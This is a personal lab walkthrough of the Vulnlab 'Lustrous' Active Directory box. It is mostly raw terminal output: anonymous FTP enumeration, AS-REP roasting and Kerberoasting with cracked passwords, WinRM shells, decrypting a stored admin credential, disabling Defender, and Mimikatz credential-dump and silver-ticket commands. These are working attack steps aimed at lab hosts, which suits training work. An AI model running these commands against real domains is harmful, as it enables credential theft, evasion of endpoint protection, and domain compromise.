Here is my note on LUSTROUS box from Vulnlab.
LUSTROUS:
LUSDC: 10.10.232.181
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21 11:50AM <DIR> transfer
| ftp-syst:
|_ SYST: Windows_NT
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
|_banner: 220 Microsoft FTP Service
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21 11:50AM <DIR> transfer
| ftp-syst:
|_ SYST: Windows_NT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
ftp> cd ben.cox
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
12-26-21 11:51AM 2944 users.csv
226 Transfer complete.
ftp> clear
?Invalid command.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
12-26-21 11:51AM 2944 users.csv
226 Transfer complete.
ftp> get users.csv
local: users.csv remote: users.csv
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |***********************************************************************************************************************************************************************************************| 2944 19.92 KiB/s 00:00 ETA
226 Transfer complete.
2944 bytes received in 00:00 (19.90 KiB/s)
ftp> cd ..
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
12-26-21 11:51AM <DIR> ben.cox
12-26-21 11:49AM <DIR> rachel.parker
12-26-21 11:49AM <DIR> tony.ward
12-26-21 11:50AM <DIR> wayne.taylor
226 Transfer complete.
ftp> cd rachel.parker
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> cd ..
250 CWD command successful.
ftp> cd tony.ward
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> cd ..
c250 CWD command successful.
ftp> cd wayne.taylor
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
-Users.csv file is very interesting.
-FTP has read and write permission to anywhere within FTP directory.
ben.cox -# Vulnerable to ASREPROASTING !
rachel.parker
tony.ward
wayne.taylor
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
#Nothig Interested, could be useful as a last resort for enumeration.
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
200 GET 334l 2089w 180418c http://10.10.232.181/iisstart.png
200 GET 32l 55w 703c http://10.10.232.181/
403 GET 29l 92w 1233c http://10.10.232.181/aspnet_client/
403 GET 29l 92w 1233c http://10.10.232.181/Aspnet_client/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.232.181
+ Target Hostname: 10.10.232.181
+ Target Port: 80
+ Start Time: 2024-02-26 10:58:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/miss
ing-content-type-header/
+ /idJqPlMR.: Retrieved x-aspnet-version header: 4.0.30319.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ 7703 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-02-26 11:16:55 (GMT-5) (1112 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
#Just Microsoft Server, nothing interested.
443/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
LusDC.lustrous.vl - on both 80 and 443.
-Require Credential to login.
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-02-26 15:07:32Z)
-NOPE.
-Useful for further enumeration.
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# sudo GetNPUsers.py -no-pass -dc-ip 10.10.232.181 -usersfile users.txt lustrous.vl/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
$krb5asrep$23$ben.cox@LUSTROUS.VL:ae616a3774317915d84ed5bf2dc892be$e05e2d41e4568c7f5572cc1ba803930ed597c11f222a0e64d3006ca3d46ca1fb05d48c5bc9e8f02aa7ea41653a66b2380a9400ec1395a7f1902ce5e80e1eb417dfd2f037e9a94b102bd8861a08148248225ce96346a949edc88268f9bc54b8d432d2a7af1b0a51cf5cab592bdbb7aeac7bec3390e4e5728b445bfc294341c2fb2c848690d21cf8b76ae4b66e1abeffc8f90890149a3ac9fff990141f9a6daae8a81a59763fc2fb32245ce22434b7e1e842c7ba2c2beb9d1a7e34474412225165a2ad7f1a5d249786a59d390824169da7133772e10e39a550e4f97ae9c1c1ff208a77444e30bee3500794
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
-ben.cox vulnerable to ASREPROASTING !
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt ben.cox_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Trinity1 ($krb5asrep$23$ben.cox@LUSTROUS.VL)
1g 0:00:00:00 DONE (2024-02-26 11:58) 7.692g/s 456861p/s 456861c/s 456861C/s blueboy1..062906
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
ben.cox:Trinity1
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# sudo rdate -n 10.10.232.181
Mon Feb 26 11:12:10 EST 2024
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# sudo impacket-GetUserSPNs 'lustrous.vl/ben.cox:Trinity1' -dc-ip 10.10.232.181 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------- ------- -------- -------------------------- -------------------------- ----------
http/lusdc svc_web 2021-12-22 07:46:12.670282 2024-02-26 10:08:39.684455
http/lusdc.lustrous.vl svc_web 2021-12-22 07:46:12.670282 2024-02-26 10:08:39.684455
MSSQL/lusdc svc_db 2021-12-22 07:46:34.170590 <never>
MSSQL/lusdc.lustrous.vl svc_db 2021-12-22 07:46:34.170590 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$7e4441cdee666ef2e137f614c0d51004$55ae905fe28143c4961648ae4c5e0e2c6cb6707b3d26b7733cbf0e8864e2583b4e43ef2048df2f244ee90f09b8a59164267d6c4cb16ee17d40e453d9493334f83199b65b284cfdc90a22d5347a0c2026434ab6bf624c58e45faf6cf878804f9bdc89abfe116fa46d1ff79d1e183eaaeb1c8db0f731e16109b99f92704f87d87397ebac6be43552bb80ce19a2d7f9a8a8b92080a8ec6d2d38641d40ef6b1616ef51bc2ae251f07b9e3fc3e50bfe8bb2fb9ca85da6f63ea6bed02d482241621a23ad7730399cf8a0bd774664abc089ab6a49a9c7c36736a9a9f87d6febb53022a2d5f0ce1530155141140cecac9ec93f8583415f3f6e10f4ab7344c9aa35b55726a5c7bfaf8eb745c4e6d8bb4aa9eacad2670d14a394ee7b4511fb115361bd0c7aa13e8fd0940c18b513026aff68362127cf53e4ebacde9d6bd7cec1bc3f87708f697e052bc0f5e9fa06497f5c489c1b776185b8bf1d4d2b0fa0934c84c7050b3c40c4e10a4d2177ed52f3a84088dec138188bb9044d3537238bd420fb554e18a141edc1cd126dc70430847aa04195a6a56cbdd5570fb092831a87df159b39bbbd1e669a3eadcd405b719939043efe16347ed744b1609131cffec43691e567cce26de95023094d26ab085357c0dcdb6f3b2569ce5ae52dbec6938d9b6a4d22d60c69b5bb65aae948509886f7860a45d18f6797f967a66e6ed1cd2aec6e143d1e4455e59f209fab18c88eca645782da1a35191ae85274f8fac467925a70b40128dc188c2e6634c0fbdeefa81409c41fb7738ce1501e5a5b38a526eb480d15cfe8d52bd1bb669655604ac18f0f1fd0cacaddde4d8f3900128108248b42cf1933aa01c01cc86a52154abf1144de026f9388f58f8a3de9a2a664c88ac43efe870054fbd0f953b3a893d1db71f6db91dd34be0fd9a80b23b0b55d507be49797ab6c44771c4f38eaa1a6cb3cbcdbb56a7dec88b26eb63d45d443858c6470b4187abfde5e498c3531b12d25186377979da52932b75637b90ba3ebd5a4078c1a6fd13f5fb68738254c436c823afb580559653414d36a968bf9d9406fcedae0a765c32317b46a305133957da362be7671a3bb63953cea7242e0a7745ec507a4a380ae564f69d5893f6f24f010530d71958c46298a9c53996f76b6a47aad55837355b6a6a6689e70784f1c94b519b37af296e3fa7a211c5a46576c6487219d8422e96cedeb1de41f6cc2f204c363c91ba8b02dd462a9ff1b5f01e7726f4f32df890586551aa07937ed144b2e1a5c359f0d88d5e61de123f93dd6c3ddbb9273934d343b774817ddb02a27ee34d62260878e67f0c27b5d0973559bc9ade5a25022a23865cb9c42243a707728d0a4bdd874e9685a06fdebcb2334489c7f75a67568d6fe4e173aca54f212e7557cd76f4655f1d8ed79377f12e4836e00573acaecee4a1f67cd1223a26d54
$krb5tgs$23$*svc_db$LUSTROUS.VL$lustrous.vl/svc_db*$e387513239649d53849946bc29c768b6$d6407867b7c34adaf7733c15f83e569d61004eb4a7cbfa973eab3f55da039aa1072c3a41bf9150fe47b3b78b6214cae45b92e7240a3f6b7dd651aab5b47cca47af17f129ff3c7d0f613a75b1a25a6755e5c040d55e3c279350d5d50da709cb16aafb853642f84a8f199bd6b936c67f106b2ed5a38100c3f8868d1bd57361f8462c28b0bb3902673f1f7e09b79e26506486633d65ac0d02960d0533cd7c908e8ad1d844896718fb1da3d37b9648a3bc2175f849d7cabc8c9e4f0227053b2c9450e728e335261a90318cd73a632d5a86fc6dc8bee4a0a4d7d7fb1d6d48696d397f6c2d2c84bffc064fe6eb23d0629237d596b3b7d2ba29f0a9b7bc83515adcc83e8f9b163f62f28cb501e39cac38560a61c6b718ee73621eb7af2f46fcec826b574de35ea99cebd4e4aff0a0841e52f681104c4efbd62058410ceff99936e9476f7f49421fb8ca302d5e34efbafaf8525ef5da00f295a7908b5554a7a2b91561e0902b160278b74a1b3b62ae007e1525ce003f17057514ef894243e3c32312d15a56b1ad2c2e7eba6a6e87a41458c2a36447bed81436f91ae7c54c244c9b2ff26c33f82e2ddc94d196dc422068a42a1ee12ce3ce52613b68fed2d5e17d7c4b339d53ac9bce72bc39e38404c143065377cbb051772618511777e49e56e5b5b546173919bb470c8add2aa6ab9ce435899f516223f87a1152dd93e277c61d40baa10e60cbc4e309b5530cfa48b0350cb8483f58f10a1f1bca1033776eff0a9e6c53be552c7e188f07e5cbcb251d0db6e5879b6b88c56201c2dc97ff3f6c3a6b4f552b19c609a1a1044c41bc0a2e3c6e4dd93228bf13a89b106ba987f692fb32ca92725f794eb8e90fb15188d108c87e807a31ffe0eece85936041327995089bece8422cec08d2c02c1414594bce6532109c7aeeddf7a21c0440d8a877b67fece56ac6884b6a8039dd3d3ec09d414ad227823a6e7c4b56d6190229cbd66a32d101b194ab0e004f04670b73a583c529e3d36423dd2c851275c40195274d2362b8c3fc8cb6deaf110a475b054b6461f496c54aaf6abd10c9bdcba0033143c293bbbde1149fdf2b9e644bc85b5e67b91a5c87272b314e29cc0934511fe5cd77660533c73dcabc5aad245d6d4097aefbd62b8f640f6c4dd67ac917fcaab36335860ab04d6644fbc274b01329db8a345eae52244169ffec343244f310d15dd0affd96488f771a6c0e830b54420c4722c2191c6f13479dbf244a12b09cbece8df162cc336cc937c8f2444644537071b1e22cf9c3faf297d0e5f5cb0ec6f4363be6ae5735ce528b3f89d5fb8fae99cc2c23b88d1de5524396e22ad02ec1808e315d41d7c197c98d4756ad8f31c1e496fde24556a5f131ff720bff7ca82329c98e48349dc9bc214d8dfad569c41259c97415ccdbd0f31bbfd6dac6207ec1a657ea855c23186898e07419
svc_web:iydgTvmujl6f
svc_db:[UNKONWN] - NOPE !
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/results/10.10.232.181/scans/tcp135]
└─# impacket-rpcdump @10.10.232.181 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
┌──(root㉿kali)-[/home/…/results/10.10.232.181/scans/tcp135]
└─# rpcclient --user="" --command=enumdomusers -N 10.10.232.181
result was NT_STATUS_ACCESS_DENIED
-ACCESS-DENIED
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
do_connect: Connection to 10.10.232.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
445/tcp open microsoft-ds? syn-ack ttl 127
┌──(root㉿kali)-[/home/…/results/10.10.232.181/scans/tcp445]
└─# smbclient -N -L 10.10.232.181 -U "Guest"
session setup failed: NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/…/results/10.10.232.181/scans/tcp445]
└─# smbclient -N -L 10.10.232.181 -U ""
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.232.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
-NOPE.
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# crackmapexec smb 10.10.232.181 -u ben.cox -p "Trinity1" --shares
SMB 10.10.232.181 445 LUSDC [*] Windows 10.0 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB 10.10.232.181 445 LUSDC [+] lustrous.vl\ben.cox:Trinity1
SMB 10.10.232.181 445 LUSDC [+] Enumerated shares
SMB 10.10.232.181 445 LUSDC Share Permissions Remark
SMB 10.10.232.181 445 LUSDC ----- ----------- ------
SMB 10.10.232.181 445 LUSDC ADMIN$ Remote Admin
SMB 10.10.232.181 445 LUSDC C$ Default share
SMB 10.10.232.181 445 LUSDC IPC$ READ Remote IPC
SMB 10.10.232.181 445 LUSDC NETLOGON READ Logon server share
SMB 10.10.232.181 445 LUSDC SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# sudo lookupsid.py ben.cox@10.10.232.181 | tee usernames
Password:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.232.181
[*] StringBinding ncacn_np:10.10.232.181[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2355092754-1584501958-1513963426
grep SidTypeUser usernames | awk '{print $2}' | cut -d ""\\"" -f2 > users2.txt
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/scans]
└─# ldapsearch -x -H ldap://10.10.232.181 -D '' -w '' -b "DC=lustrous,DC=vl"
# extended LDIF
#
# LDAPv3
# base <DC=lustrous,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
#LDAP V3 - NOPE !
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2024-02-26T15:09:17+00:00; -58m39s from scanner time.
| rdp-ntlm-info:
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
┌──(root㉿kali)-[/home/…/results/10.10.232.181/loot/BLOOD]
└─# crackmapexec winrm 10.10.232.181 -u ben.cox -p "Trinity1"
SMB 10.10.232.181 5985 LUSDC [*] Windows 10.0 Build 20348 (name:LUSDC) (domain:lustrous.vl)
HTTP 10.10.232.181 5985 LUSDC [*] http://10.10.232.181:5985/wsman
WINRM 10.10.232.181 5985 LUSDC [-] lustrous.vl\ben.cox:Trinity1
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
60215/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
61854/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
61894/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Service Info: Host: LUSDC; OS: Windows; CPE: cpe:/o:microsoft:windows
LUSMS:10.10.232.182
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
-ACCESS-DENIED.
┌──(root㉿kali)-[/home/…/results/10.10.232.182/scans/tcp135]
└─# impacket-rpcdump @10.10.232.182 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
-VULNERABLE TO PRINT-NIGHTMARE.
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
-NT_STATUS_ACCESS_DENIED
445/tcp open microsoft-ds? syn-ack ttl 127
┌──(root㉿kali)-[/home/…/results/10.10.232.182/scans/tcp445]
└─# smbclient -N -L 10.10.232.182
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/…/results/10.10.232.182/scans/tcp445]
└─# smbclient -N -L 10.10.232.182 -U ""
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/…/results/10.10.232.182/scans/tcp445]
└─# smbclient -N -L 10.10.232.182 -U "Guest"
session setup failed: NT_STATUS_LOGON_FAILURE
-NO SMB ACCESS.
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# crackmapexec smb 10.10.232.182 -u svc_web -p "iydgTvmujl6f" --shares
SMB 10.10.232.182 445 LUSMS [*] Windows 10.0 Build 20348 x64 (name:LUSMS) (domain:lustrous.vl) (signing:False) (SMBv1:False)
SMB 10.10.232.182 445 LUSMS [+] lustrous.vl\svc_web:iydgTvmujl6f
SMB 10.10.232.182 445 LUSMS [+] Enumerated shares
SMB 10.10.232.182 445 LUSMS Share Permissions Remark
SMB 10.10.232.182 445 LUSMS ----- ----------- ------
SMB 10.10.232.182 445 LUSMS ADMIN$ Remote Admin
SMB 10.10.232.182 445 LUSMS C$ Default share
SMB 10.10.232.182 445 LUSMS IPC$ READ Remote IPC
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# crackmapexec smb 10.10.232.182 -u ben.cox -p "Trinity1" --shares
SMB 10.10.232.182 445 LUSMS [*] Windows 10.0 Build 20348 x64 (name:LUSMS) (domain:lustrous.vl) (signing:False) (SMBv1:False)
SMB 10.10.232.182 445 LUSMS [+] lustrous.vl\ben.cox:Trinity1
SMB 10.10.232.182 445 LUSMS [+] Enumerated shares
SMB 10.10.232.182 445 LUSMS Share Permissions Remark
SMB 10.10.232.182 445 LUSMS ----- ----------- ------
SMB 10.10.232.182 445 LUSMS ADMIN$ Remote Admin
SMB 10.10.232.182 445 LUSMS C$ Default share
SMB 10.10.232.182 445 LUSMS IPC$ READ Remote IPC
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2024-02-26T15:14:02+00:00; -58m39s from scanner time.
| rdp-ntlm-info:
| Target_Name: LUSTROUS
| NetBIOS_Domain_Name: LUSTROUS
| NetBIOS_Computer_Name: LUSMS
| DNS_Domain_Name: lustrous.vl
| DNS_Computer_Name: LusMS.lustrous.vl
| DNS_Tree_Name: lustrous.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-02-26T15:13:22+00:00
| ssl-cert: Subject: commonName=LusMS.lustrous.vl
| Issuer: commonName=LusMS.lustrous.vl
| compressors:
| NULL
| cipher preference: server
| warnings:
| 64-bit block cipher 3DES vulnerable to SWEET32 attack
|_ least strength: C
| rdp-ntlm-info:
| Target_Name: LUSTROUS
| NetBIOS_Domain_Name: LUSTROUS
| NetBIOS_Computer_Name: LUSMS
| DNS_Domain_Name: lustrous.vl
| DNS_Computer_Name: LusMS.lustrous.vl
| DNS_Tree_Name: lustrous.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-02-26T14:59:31+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
┌──(root㉿kali)-[/home/…/results/10.10.232.181/loot/BLOOD]
└─# crackmapexec winrm 10.10.232.182 -u ben.cox -p "Trinity1"
SMB 10.10.232.182 5985 LUSMS [*] Windows 10.0 Build 20348 (name:LUSMS) (domain:lustrous.vl)
HTTP 10.10.232.182 5985 LUSMS [*] http://10.10.232.182:5985/wsman
WINRM 10.10.232.182 5985 LUSMS [+] lustrous.vl\ben.cox:Trinity1 (Pwn3d!)
#Because the user has remote-access group.
-USER-SHELL !
#NO USER FLAG THOUGH !
PRIV ESC:
┌──(root㉿kali)-[/home/…/results/10.10.232.181/loot/BLOOD]
└─# evil-winrm -i 10.10.232.182 -u ben.cox -p 'Trinity1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ben.cox\Documents> whoami
lustrous\ben.cox
*Evil-WinRM* PS C:\Users\ben.cox\Documents>
*Evil-WinRM* PS C:\Users\ben.cox\Documents> dir
*Evil-WinRM* PS C:\Users\ben.cox\Documents> cd ..
*Evil-WinRM* PS C:\Users\ben.cox> cd Desktop
dir
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> dir
Directory: C:\Users\ben.cox\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/26/2021 10:30 AM 1652 admin.xml
*Evil-WinRM* PS C:\Users\ben.cox\Desktop>
*Evil-WinRM* PS C:\Users\ben.cox> cd Desktop
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> download admin.xml
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# evil-winrm -i 10.10.232.182 -u ben.cox -p 'Trinity1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ben.cox\Documents> cd ..
cd Des*Evil-WinRM* PS C:\Users\ben.cox> cd Desktop
dir
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> dir
Directory: C:\Users\ben.cox\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/26/2021 10:30 AM 1652 admin.xml
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Credential = Import-Clixml -Path "admin.xml"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Credential.GetNetworkCredential().password
XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> exit
Info: Exiting with code 0
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# crackmapexec winrm 10.10.232.182 -u administrator -p "XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF" --local-auth
SMB 10.10.232.182 5985 LUSMS [*] Windows 10.0 Build 20348 (name:LUSMS) (domain:LUSMS)
HTTP 10.10.232.182 5985 LUSMS [*] http://10.10.232.182:5985/wsman
WINRM 10.10.232.182 5985 LUSMS [+] LUSMS\administrator:XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF (Pwn3d!)
-ADMIN SHELL !
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# evil-winrm -i 10.10.232.182 -u administrator -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/27/2021 1:26 PM 36 flag.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
USER_FLAG.TXT: VL{REDIRECTED}
POST-EXPLOITATION:
Set-MpPreference -DisableRealtimeMonitoring $true
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "vault::cred /patch" "exit"'
#No mimikatz.
Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /user:tony.ward" "exit"'
HTTP Silver Ticket:
#Not for a shell or RCE but it's useful for further enumeration like discover creds either through a pages or hidden folders and lateral-movement purposes.
https://www.vuln.dev/2021/12/27/lab-lustrous-walkthrough/
https://medium.com/@thebinary0x1/lustrous-vulnlab-walkthrough-f314f8b86134
https://medium.com/@thebinary0x1/lustrous-vulnlab-walkthrough-f314f8b86134
How Attackers Use Kerberos Silver Tickets to Exploit Systems
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
iwr http://lusdc.lustrous.vl -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
<li><a href="/Internal">Notes</a></li>
iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
<p>Welcome, LUSTROUS\LUSMS$!</p>
mimikatz # kerberos::golden /sid:S-1-5-21-4172452648-1021989953-2368502130-1105 /domain:offense.local /ptt /id:1155 /target:dc-mantvydas.offense.local /service:http /rc4:a87f3a337d73085c45f9416be5787d86 /user:beningnadmin
mimikatz # kerberos::golden /domain:lustrous.vl /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /user:tony.ward /target:LusDC.lustrous.vl /id:1114 /service:http/lusdc.lustrous.vl /ptt
Invoke-Mimikatz -Command '"kerberos::golden /domain:lustrous.vl /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /user:tony.ward /target:LusDC.lustrous.vl /id:1114 /service:http/lusdc.lustrous.vl /ptt" "exit"'
Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /user:tony.ward" "exit"'
PS C:\Users\Administrator> Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /user:tony.ward" "exit"'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
